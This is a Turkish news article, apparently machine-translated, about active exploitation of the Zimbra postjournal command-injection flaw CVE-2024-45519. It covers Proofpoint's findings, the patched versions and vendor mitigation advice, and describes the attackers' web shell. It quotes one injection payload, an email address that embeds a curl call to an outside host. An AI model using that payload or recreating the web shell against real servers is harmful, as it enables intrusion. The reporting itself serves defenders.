Siber güvenlik araştırmacıları, Synacor’un Zimbra İşbirliğinde yeni ortaya çıkan bir güvenlik açığını hedef alan aktif istismar girişimleri konusunda uyarıda bulunuyor.
Kurumsal güvenlik firması Proofpoint, etkinliği 28 Eylül 2024’ten itibaren gözlemlemeye başladığını söyledi. Saldırılar, kimlik doğrulaması yapılmamış saldırganların etkilenen Zimbra kurulumlarında rastgele komutlar yürütmesine olanak tanıyan, günlük sonrası hizmetinde ciddi bir güvenlik açığı olan CVE-2024-45519’dan yararlanmayı amaçlıyor.
Proofpoint, X’teki bir dizi gönderisinde “Gmail sahtekarlığı yapan e-postalar, Zimbra sunucularının bunları ayrıştırıp komut olarak yürütmesi amacıyla CC alanlarındaki sahte adreslere gönderildi.” dedi. “Adresler, sh yardımcı programı.”
Kritik sorun, Zimbra tarafından 4 Eylül 2024’te yayınlanan 8.8.15 Yama 46, 9.0.0 Yama 41, 10.0.9 ve 10.1.1 sürümlerinde giderildi. Lebr0nli (Alan Li) adlı bir güvenlik araştırmacısının bu konuyu keşfetmesiyle itibar edildi. ve eksikliklerin raporlanması.
Synacor’da güvenlik mimarı mühendisi Ashish Kataria, 19 Eylül 2024 tarihli bir yorumunda “Günlük sonrası özelliği çoğu sistemde isteğe bağlı veya etkin olmasa da, olası istismarı önlemek için sağlanan yamayı uygulamak hala gerekli” dedi.
“Günlük sonrası özelliğinin etkinleştirilmediği ve yamanın hemen uygulanamadığı Zimbra sistemleri için, günlük sonrası ikili dosyasının kaldırılması, yama uygulanana kadar geçici bir önlem olarak düşünülebilir.”
Proofpoint, kodu çözüldüğünde savunmasız bir Zimbra sunucusuna şu konumdaki bir web kabuğu yazmaya çalışan bir dizi CC’d adresi tanımladığını söyledi: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”
Yüklenen web kabuğu daha sonra önceden belirlenmiş bir JSESSIONID Çerez alanıyla gelen bağlantıyı dinler ve varsa, Base64 komutları için JACTION çerezini ayrıştırmaya devam eder.
Web kabuğu, exec aracılığıyla komut yürütme desteğiyle donatılmıştır. Alternatif olarak, bir dosyayı soket bağlantısı üzerinden indirip çalıştırabilir. Bu yazının yazıldığı tarih itibarıyla saldırılar bilinen bir tehdit aktörüne veya grubuna atfedilmemiştir.
Bununla birlikte, istismar faaliyeti, Project Discovery’nin kusurun teknik ayrıntılarını yayınlamasından bir gün sonra başlamış gibi görünüyor; bu, “saldırganların keyfi komutlar vermesine olanak tanıyan, yamalanmamış sürümde popen’e aktarılan temizlenmemiş kullanıcı girdisinden kaynaklandığını” söyledi.
Siber güvenlik şirketinin sorunu, C tabanlı günlük sonrası ikili yazılımının alıcı e-posta adreslerini “msg_handler()” adı verilen bir işlevde işlemesi ve ayrıştırması, böylece özel hazırlanmış bir SMTP mesajı iletirken 10027 numaralı bağlantı noktasında çalışan hizmete komut enjeksiyonuna izin verme biçiminden kaynaklanmaktadır. sahte bir adresle (örneğin, “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
Aktif istismar girişimleri ışığında, potansiyel tehditlere karşı optimum koruma sağlamak için kullanıcıların en son yamaları uygulamaları şiddetle tavsiye edilir.